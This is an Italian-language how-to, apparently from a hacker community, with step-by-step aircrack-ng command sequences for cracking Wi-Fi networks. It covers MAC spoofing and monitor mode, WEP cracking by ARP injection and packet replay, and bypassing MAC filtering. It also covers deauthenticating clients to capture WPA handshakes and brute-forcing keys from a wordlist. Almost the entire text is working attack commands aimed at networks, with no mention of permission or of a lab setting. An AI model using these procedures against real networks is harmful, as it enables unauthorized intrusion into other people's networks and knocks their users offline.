#zeld AT freaknet DOT org ____ ___ _____ _____ ______ __ | _ \ / _ \| ____|_ _| _ \ \ / / | |_) | | | | _| | | | |_) \ V / | __/| |_| | |___ | | | _ < | | |_| \___/|_____| |_| |_| \_\|_| _ _ _ __ ___ (_)_ __ (_) | '_ ` _ \| | '_ \| | | | | | | | | | | | | |_| |_| |_|_|_| |_|_| _ _ _____ _______ ___ | | | |/ _ \ \ / /_ _/ _ \ | |_| | | | \ \ /\ / / | || | | | | _ | |_| |\ V V / | || |_| | |_| |_|\___/ \_/\_/ |_| \___/ __ _ \ \ (_) | | _ | | (_) | | /_/ ############Impostare l'interfaccia in "mode monitor" airmon-ng stop ath0 ifconfig wifi0 down macchanger --mac=00:11:22:33:44:55 wifi0 airmon-ng start wifi0 ###############Craccare una WEP #I requisiti necessari: -Server un client connesso all'AP -Conoscere BISSID AP tramite kismet (shift + s , shift + b e selezionare la rete da Bucare) -Conoscere il MAC address di un client Connesso in wifi (Nella stessa finestra aperta tramite selezione del BSSID dell'AP basta dare shift + c per avere il MAC address dei client connessi) #Per catturare i pacchetti usare questo comando airodump-ng --channel --bssid --write ath0 #Craccare in poco tempo con un ARP injection *controllare se il mac filtering e' attivo con questo comando: aireplay-ng -1 0 -e -a -h MY:MA:CA:DD:RE:SS Se risponde che riesce ad allinearsi allora continuare con questo altrimeti vai sotto nella sezione MAC FILTERING abilitato aireplay-ng -3 -b -h INTERFACCIA #Deautenticare il client un attimo per far partire richieste ARP aireplay-ng -0 5 -a -c INTERFACCIA << Serve per deautenticare il client_connesso #Oppure invece dell' ARP injection usare un #Interactive Packet Replay al posto del pachet injection classico, questa e' un'altra tecnica #pero' non e' efficace come l'ARP injection aireplay-ng -2 -b -h -n 100 -p 0841 -c ath0 #MAC FILTERING ABILITATO #Deauthentication: aireplay-ng -0 5 -a -c 00:00:00:00:00:00 #Re-injection aireplay-ng -3 -b -h 00:00:00:00:00:00 #Usare in aircrack l'opzione -m per filtrare i pacchetti # Vedi come Decriptare tutti i pacchetti catturati con aircrack nella sezione in fondo al documento ##############Craccare la WPA: l'unico attacco: deautentication. #L'occorrente * Mac Address del pc Attaccante * Mac Address del client connesso all' AP * Mac Address(BSSID) dell' AP * ESSID dell'AP * Canale dell'AP * Interfaccia attaccante #Portare l'interfaccia in "Mode Monitor" come fatto in precedenza ma con una variante airmon-ng stop ath0 maccanger --mac=00:11:22:33:44:55 wifi0 airmon-ng start wifi0 N Dove N= Canale access point #Lanciare Airodump in maniera da catturare i pacchetti Handshake airodump-ng -c --bssid -w ath0 N.B.: Non bisogna usare l'opzione --ivs #Tramite airodump e' possibile vedere se vi sono client connessi, e vedremo sotto BSSID STATION PWR Lost Packets Probes etc.... tutti i client connessi.. #A questo punto scegliere tra tutti un client e deautenticarlo con questo comando: aireplay-ng -0 1 -a -c ath0 opp. aireplay-ng -0 5 -a -c ath0 #A questo punto usare un bruteforce per trovare la chiave dagli handshake aircrack-ng -a 2 -b -w /path/to/wordlist *.cap #Se questo comando ci risponde No valid WPA handshakes found. #Allora aspettare in ascolto che un client si autentichi o deautenticare il client aspettando che si riautentichi #######Decriptare i pacchetti Catturati # aspettiamo 200.000 pacchetti per una chiave WEP 64bit, 500.000 per una WEP 128bit e 1.000.000/2.000.000 e oltre per una WEP 256bit aircrack-ng .cap # Con l'opzione -a intendiamo il tipo di attacco: -a 1 e' un attacco da usare con la wep -a 2 e' un attacco da usare con la WPA-PSK #In piu' possiamo specificare il fattore di bruteforce con -f e di default e' 2 ##Bruteforce aircrack-ng -a 2 -b -w /path/to/wordlist *.cap * -a 1 : forces a WEP attack mode (2 forces WPA) * either -b for the bssid or -e for the essid : whichever is easier to type but I like using a BSSID because its more unique. * -n 64 or -n 128 : WEP key length, omit if not known by now. So our command will look like: aircrack-ng -a 1 -b -n 128 NOME_FILE.ivs #N.B.: Se si e' fatto un attacco di tipo Packet Injection e si sono catturati sia pacchetti che ivs allora si puo' usare l'attacco PWT con l'opzione -z aircrack-ng -a 1 -z -b -n 128 * con * intendiamo tutti i pacchetti catturati #Per velocizzare il cracking della chiave si puo supporre una chiave a 64 bit (-n 64) e se non si ottengono risultati si puo supporre una chiave a 128 bit (-n 128) #via via poi a 256 bit (-n 256)